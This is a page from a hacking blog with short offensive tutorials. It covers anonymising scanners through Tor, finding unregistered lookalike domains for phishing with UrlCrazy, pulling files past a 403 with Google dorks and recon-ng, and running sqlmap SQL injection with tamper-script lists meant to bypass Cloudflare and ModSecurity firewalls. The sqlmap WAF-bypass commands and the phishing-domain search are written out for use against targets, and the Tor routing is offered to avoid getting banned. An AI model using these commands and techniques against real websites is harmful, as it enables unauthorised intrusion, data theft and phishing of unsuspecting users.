phat-hacks.com

## A Cyber Security Blog ##

Latest Post


Here's a simple way to improve your anonymity by running your tools through TOR proxy.


1st - From the command line type: sudo apt-get install tor
Note: this doesn't install the actual browser

2nd - Start the TOR proxy service: sudo service tor start
TOR proxy service should now  be listening on port 9050. We can check this by typing: sudo netstat -plnt
We should see:
tcp        0      0 127.0.0.1:9050 

3rd - Add the tor proxy to the settings of your tools. Most tools have a --proxy switch. TOR proxy is socks5, so you'll sometimes need to specify it.

For example, when using wpscan, you'll type:
sudo wpscan --url http://example.com --proxy=socks5://127.0.0.1:9050

There are other times when you don't need to specify socks5. For example, you can see that in dirbuster - we just add host:127.0.0.1 port:9050

[Image: p6RkF0u.png]
If you are using a Windows system and wish to see which ports are listening, type -abno into the terminal.

beware of phishing



Here's a quick and easy way to find a good phishing domain that looks "almost" like the real website.

We can simply use UrlCrazy on Linux.

Let's check the options first. Open the terminal, then type: urlcrazy --help



 If we don't require these options, we can just leave them out.
Let's see what domains are similar to google.com, and are available. Type: urlcrazy google.com


 The above image is just a short cropping of a heck load of results. The idea here is to ignore the domains that already have DNS info (which means they are taken) and check out the ones that have no DNS or a ?.

[Image: 403forbidden.png]
 

We have all came across 403 FORBIDDEN at some point while surfing the Internet. Although it is true that we are unable to venture further into the websites directory, by just thinking outside of the box, we can still gain access to any files that are beyond this location.

While doing some reconnaissance on a website, we noticed two interesting  directory paths:

www.example.com/documents/  and www.example.com/wp-uploads/


 First, we try the /documents/ path, but notice that it is made public, and this is where they keep files for visitors to read.

Second, we try the /wp-uploads/ path, which greets us with:

[Image: Screenshot%2Bfrom%2B2017-03-18%2B14-18-33.png]


Seems we are out of luck, and there is no going forward beyond this point.

However, we can work around this problem. By using Google Dorks, we can see if Google has any knowledge of files uploaded onto our target website.

We can go to the Google search engine, then type:

Quote:
site:example.com filetype:pdf OR filetype:docx OR filetype:xlsx OR filetype:pptx OR filetype:doc OR filetype:xls OR filetype:ppt

We can keep adding filetypes until we're satisfied.

Another options we have is to use recon-ng. This would be a more convenient options, as we can keep all our reconnaissance work in one place.

Let's open up recon-ng in our terminal and setup the metacrawler modules:
Quote:
recon-ng
show modules
use recon/domains-contacts/metacrawler
set SOURCE example.com

after typing run, well get some results.

[Image: ss.png]

Now we can open these links in our browser. We'll get access to the files, and not not be greeted by 403 FORBIDDEN.





 We've all seen the above message.

It is possible to see what danger is ahead without continuing the connection in your browser.


We can just use curl to grab the HTML from the next page of the not secure connection and save it into a html file for us to view offline.

Open your terminal on Linux. Type: curl  bad.example.com --insecure > notsecure.html

Note: the target URL should be exactly the same as you see in your browser, so just copy & paste it.

Once we open our saved html file, we may be presented by a phishy-looking page.
Phishing Page

bypass cloudflare


If  SQLMAP informs you that the target is protected by a WAF/IPS/IDS, it can be difficult to perform the injection.
Checking for a possible WAF can be done by using the --indentify-waf switch. If there is one in place, the three mostly likely results are:
  • Cloudflare
  • Mod Security
  • Unidentified
--tor switch should also be used to avoid having you IP address banned.


[success title="Cloudflare bypass" icon="check-circle"]https://www.------.com/index.php?id=1" --tor --random-agent --check-waf --tamper="between,randomcase,space2comment" [/success] [update title="Mod Security bypass" icon="check-circle"]https://www.------.com/index.php?id=1" --tor --random-agent --check-waf --tamper="modsecurityzeroversioned,modsecurityversioned" [/update] I find that Mod Security scripts work well for 'Unidentified'. [error title="Unidentified bypass" icon="check-circle"]https://www.------.com/index.php?id=1" --tor --random-agent --check-waf --tamper="modsecurityzeroversioned,modsecurityversioned" [/error]
If you want to be noisy and try every script available, you can do the following. Make sure you have the latest version of SQLMAP.
[alert title="Hail Mary" icon="info-circle"] https://www.------.com/index.php?id=1" --tor --random-agent --check-waf --tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords" [/alert]

Phat Hacks

{twitter#https://twitter.com/phathacksweb}

Contact Form

Name

Email *

Message *

Powered by Blogger.
Javascript DisablePlease Enable Javascript To See All Widget